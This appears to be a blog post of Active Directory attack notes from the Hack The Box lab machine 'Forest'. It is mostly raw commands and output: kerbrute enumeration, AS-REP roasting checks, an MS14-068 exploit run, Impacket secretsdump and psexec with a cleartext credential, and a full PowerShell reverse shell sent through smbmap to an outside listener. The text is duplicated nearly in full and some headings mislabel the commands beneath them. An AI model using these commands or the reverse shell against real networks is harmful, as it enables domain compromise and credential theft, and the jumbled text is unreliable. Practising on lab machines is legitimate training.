What to try with limited or no authentication.
* ASP-REPRoasting - if Pre-authentication Disabled is switched on. - we can do a search for this if we have any creds. Potentially from a DNS injection.
git clone https://github.com/the-useless-one/pywerview.git
python /opt/pywerview/pywerview.py get-netuser -u USER -p'PASSWORD' -d DOMAIN --preauth-notreq -t IP | grep -e 'useraccountcontrol' -e 'samaccountname'
samaccountname: mh_
useraccountcontrol: ['DONT_REQ_PREAUTH', 'NORMAL_ACCOUNT', 'DONT_EXPIRE_PASSWORD']
samaccountname: kb_
useraccountcontrol: ['DONT_REQ_PREAUTH', 'NORMAL_ACCOUNT']
samaccountname: nick.smith
useraccountcontrol: ['DONT_REQ_PREAUTH', 'NORMAL_ACCOUNT']
Username Enumeration
/opt/kerbrute/dist$ ./kerbrute_linux_amd64 userenum --dc 10.10.10.161 -d htb.local -t 80 /opt/wordlists/SecLists/Usernames/Names/names.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9dad6e1) - 12/16/19 - Ronnie Flathers @ropnop
2019/12/16 15:50:16 > Using KDC(s):
2019/12/16 15:50:16 > 10.10.10.161:88
2019/12/16 15:50:16 > [+] VALID USERNAME: andy@htb.local
2019/12/16 15:50:17 > [+] VALID USERNAME: forest@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME: lucinda@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME: mark@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME: sebastien@htb.local
2019/12/16 15:50:22 > Done! Tested 10163 usernames (5 valid) in 5.919 seconds
Chck for GPP Passwords on DC
python ms14-068.py -u 'svc-alfresco@htb.local' -p 's3rvice' -s 'S-1-5-21-3072663084-364016917-1341370565-1147' -d 10.10.10.161
[+] Building AS-REQ for 10.10.10.161... Done!
[+] Sending AS-REQ to 10.10.10.161... Done!
[+] Receiving AS-REP from 10.10.10.161... Done!
[+] Parsing AS-REP from 10.10.10.161... Done!
[+] Building TGS-REQ for 10.10.10.161... Done!
[+] Sending TGS-REQ to 10.10.10.161... Done!
[+] Receiving TGS-REP from 10.10.10.161... Done!
[+] Parsing TGS-REP from 10.10.10.161... Done!
[+] Creating ccache file 'TGT_svc-alfresco@htb.local.ccache'... Done!
impacket-GetUserSPNs htb.local/svc-alfresco:s3rvice -dc-ip 10.10.10.161 -request
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
No entries found!
gt-ns@PTL-03:/opt/hacking/htb/10.10.10.161-forest$ sudo python /usr/share/doc/python3-impacket/examples/GetADUsers.py -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice -all
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Querying 10.10.10.161 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator Administrator@htb.local 2019-09-18 18:09:08.342879 2019-10-07 11:57:07.299606
Guest <never> <never>
DefaultAccount <never> <never>
krbtgt 2019-09-18 11:53:23.467452 <never>
$331000-VK4ADACQNUCA <never> <never>
SM_2c8eef0a09b545acb SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local <never> <never>
SM_ca8c2ed5bdab4dc9b SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local <never> <never>
SM_75a538d3025e4db9a SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local <never> <never>
SM_681f53d4942840e18 DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local <never> <never>
SM_1b41c9286325456bb Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local <never> <never>
SM_9b69f1b9d2cc45549 FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local <never> <never>
SM_7c96b981967141ebb SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local <never> <never>
SM_c75ee099d0a64c91b SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local <never> <never>
SM_1ffab36a2f5f479cb SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local <never> <never>
HealthMailboxc3d7722 HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local 2019-09-23 23:51:31.892097 2019-09-23 23:57:12.361516
HealthMailboxfc9daad HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local 2019-09-23 23:51:35.267114 2019-09-23 23:52:05.736012
HealthMailboxc0a90c9 HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local 2019-09-19 12:56:35.206329 <never>
HealthMailbox670628e HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local 2019-09-19 12:56:45.643993 <never>
HealthMailbox968e74d HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local 2019-09-19 12:56:56.143969 <never>
HealthMailbox6ded678 HealthMailbox6ded67848a234577a1756e072081d01f@htb.local 2019-09-19 12:57:06.597012 <never>
HealthMailbox83d6781 HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local 2019-09-19 12:57:17.065809 <never>
HealthMailboxfd87238 HealthMailboxfd87238e536e49e08738480d300e3772@htb.local 2019-09-19 12:57:27.487679 <never>
HealthMailboxb01ac64 HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local 2019-09-19 12:57:37.878559 <never>
HealthMailbox7108a4e HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local 2019-09-19 12:57:48.253341 <never>
HealthMailbox0659cc1 HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local 2019-09-19 12:57:58.643994 <never>
sebastien 2019-09-20 01:29:59.544725 2019-09-22 23:29:29.586227
lucinda 2019-09-20 01:44:13.233891 <never>
svc-alfresco 2019-12-15 19:50:14.415274 2019-12-15 19:36:10.741562
andy 2019-09-22 23:44:16.291082 <never>
mark 2019-09-20 23:57:30.243568 <never>
santi 2019-09-21 00:02:55.134828 <never>
sudo python /usr/share/doc/python3-impacket/examples/wmiexec.py -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
sudo python /usr/share/doc/python3-impacket/examples/secretsdump.py -user-status -history -use-vss -just-dc -dc-ip 10.10.10.161 forest.htb.local/svc-alfresco:s3rvice@10.10.10.161
/usr/share/doc/python3-impacket/examples/psexec.py htb.local/svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
gt-ns@PTL-03:/usr/share/responder/tools$ smbmap -d htb.local -u svc-alfresco -p s3rvice -H 10.10.10.161
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.161...
[+] IP: 10.10.10.161:445 Name: 10.10.10.161
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
.
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 lsass
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 ntsvcs
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 scerpc
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-324-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 epmapper
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-1bc-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 eventlog
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-388-0
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 atsvc
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-3d8-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-244-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-244-1
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-42c-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 RpcProxy\49676
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 3a5b3f089f2a38ce
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 RpcProxy\593
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 srvsvc
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 efsrpc
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 netdfs
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-23c-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 W32TIME_ALT
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-73c-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-784-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 PSHost.132209377688684725.1492.DefaultAppDomain.powershell
IPC$ READ ONLY Remote IPC
.
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 .
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 ..
NETLOGON READ ONLY Logon server share
.
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 .
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 ..
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 htb.local
SYSVOL READ ONLY Logon server share
Reverse shell with SMBMAP and Powershell - Start a listener 4445
smbmap -d htb.local -u svc-alfresco -p s3rvice -H 10.10.10.161 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""10.10.14.17""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
python psexec.py htb.local/svc-alfresco:s3rvice@10.10.10.161
* ASP-REPRoasting - if Pre-authentication Disabled is switched on. - we can do a search for this if we have any creds. Potentially from a DNS injection.
git clone https://github.com/the-useless-one/pywerview.git
python /opt/pywerview/pywerview.py get-netuser -u USER -p'PASSWORD' -d DOMAIN --preauth-notreq -t IP | grep -e 'useraccountcontrol' -e 'samaccountname'
samaccountname: mh_
useraccountcontrol: ['DONT_REQ_PREAUTH', 'NORMAL_ACCOUNT', 'DONT_EXPIRE_PASSWORD']
samaccountname: kb_
useraccountcontrol: ['DONT_REQ_PREAUTH', 'NORMAL_ACCOUNT']
samaccountname: nick.smith
useraccountcontrol: ['DONT_REQ_PREAUTH', 'NORMAL_ACCOUNT']
No Authentication
Username Enumeration
/opt/kerbrute/dist$ ./kerbrute_linux_amd64 userenum --dc 10.10.10.161 -d htb.local -t 80 /opt/wordlists/SecLists/Usernames/Names/names.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9dad6e1) - 12/16/19 - Ronnie Flathers @ropnop
2019/12/16 15:50:16 > Using KDC(s):
2019/12/16 15:50:16 > 10.10.10.161:88
2019/12/16 15:50:16 > [+] VALID USERNAME: andy@htb.local
2019/12/16 15:50:17 > [+] VALID USERNAME: forest@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME: lucinda@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME: mark@htb.local
2019/12/16 15:50:18 > [+] VALID USERNAME: sebastien@htb.local
2019/12/16 15:50:22 > Done! Tested 10163 usernames (5 valid) in 5.919 seconds
Chck for GPP Passwords on DC
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
Basic Authentication
If ms14-068 is avaible we can make a TGT
[+] Building AS-REQ for 10.10.10.161... Done!
[+] Sending AS-REQ to 10.10.10.161... Done!
[+] Receiving AS-REP from 10.10.10.161... Done!
[+] Parsing AS-REP from 10.10.10.161... Done!
[+] Building TGS-REQ for 10.10.10.161... Done!
[+] Sending TGS-REQ to 10.10.10.161... Done!
[+] Receiving TGS-REP from 10.10.10.161... Done!
[+] Parsing TGS-REP from 10.10.10.161... Done!
[+] Creating ccache file 'TGT_svc-alfresco@htb.local.ccache'... Done!
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
No entries found!
gt-ns@PTL-03:/opt/hacking/htb/10.10.10.161-forest$ sudo python /usr/share/doc/python3-impacket/examples/GetADUsers.py -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice -all
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Querying 10.10.10.161 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator Administrator@htb.local 2019-09-18 18:09:08.342879 2019-10-07 11:57:07.299606
Guest <never> <never>
DefaultAccount <never> <never>
krbtgt 2019-09-18 11:53:23.467452 <never>
$331000-VK4ADACQNUCA <never> <never>
SM_2c8eef0a09b545acb SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local <never> <never>
SM_ca8c2ed5bdab4dc9b SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local <never> <never>
SM_75a538d3025e4db9a SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local <never> <never>
SM_681f53d4942840e18 DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local <never> <never>
SM_1b41c9286325456bb Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local <never> <never>
SM_9b69f1b9d2cc45549 FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local <never> <never>
SM_7c96b981967141ebb SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local <never> <never>
SM_c75ee099d0a64c91b SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local <never> <never>
SM_1ffab36a2f5f479cb SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local <never> <never>
HealthMailboxc3d7722 HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local 2019-09-23 23:51:31.892097 2019-09-23 23:57:12.361516
HealthMailboxfc9daad HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local 2019-09-23 23:51:35.267114 2019-09-23 23:52:05.736012
HealthMailboxc0a90c9 HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local 2019-09-19 12:56:35.206329 <never>
HealthMailbox670628e HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local 2019-09-19 12:56:45.643993 <never>
HealthMailbox968e74d HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local 2019-09-19 12:56:56.143969 <never>
HealthMailbox6ded678 HealthMailbox6ded67848a234577a1756e072081d01f@htb.local 2019-09-19 12:57:06.597012 <never>
HealthMailbox83d6781 HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local 2019-09-19 12:57:17.065809 <never>
HealthMailboxfd87238 HealthMailboxfd87238e536e49e08738480d300e3772@htb.local 2019-09-19 12:57:27.487679 <never>
HealthMailboxb01ac64 HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local 2019-09-19 12:57:37.878559 <never>
HealthMailbox7108a4e HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local 2019-09-19 12:57:48.253341 <never>
HealthMailbox0659cc1 HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local 2019-09-19 12:57:58.643994 <never>
sebastien 2019-09-20 01:29:59.544725 2019-09-22 23:29:29.586227
lucinda 2019-09-20 01:44:13.233891 <never>
svc-alfresco 2019-12-15 19:50:14.415274 2019-12-15 19:36:10.741562
andy 2019-09-22 23:44:16.291082 <never>
mark 2019-09-20 23:57:30.243568 <never>
santi 2019-09-21 00:02:55.134828 <never>
sudo python /usr/share/doc/python3-impacket/examples/wmiexec.py -dc-ip 10.10.10.161 htb.local/svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied
/usr/share/doc/python3-impacket/examples/psexec.py htb.local/svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
gt-ns@PTL-03:/usr/share/responder/tools$ smbmap -d htb.local -u svc-alfresco -p s3rvice -H 10.10.10.161
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.161...
[+] IP: 10.10.10.161:445 Name: 10.10.10.161
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
.
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 lsass
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 ntsvcs
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 scerpc
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-324-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 epmapper
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-1bc-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 eventlog
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-388-0
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 atsvc
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-3d8-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-244-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-244-1
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-42c-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 RpcProxy\49676
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 3a5b3f089f2a38ce
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 RpcProxy\593
fr--r--r-- 4 Sun Dec 31 23:58:45 1600 srvsvc
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 efsrpc
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 netdfs
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-23c-0
fr--r--r-- 3 Sun Dec 31 23:58:45 1600 W32TIME_ALT
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-73c-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-784-0
fr--r--r-- 1 Sun Dec 31 23:58:45 1600 PSHost.132209377688684725.1492.DefaultAppDomain.powershell
IPC$ READ ONLY Remote IPC
.
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 .
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 ..
NETLOGON READ ONLY Logon server share
.
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 .
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 ..
dr--r--r-- 0 Wed Sep 18 18:46:00 2019 htb.local
SYSVOL READ ONLY Logon server share
Reverse shell with SMBMAP and Powershell - Start a listener 4445
smbmap -d htb.local -u svc-alfresco -p s3rvice -H 10.10.10.161 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""10.10.14.17""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
python psexec.py htb.local/svc-alfresco:s3rvice@10.10.10.161
No comments:
Post a Comment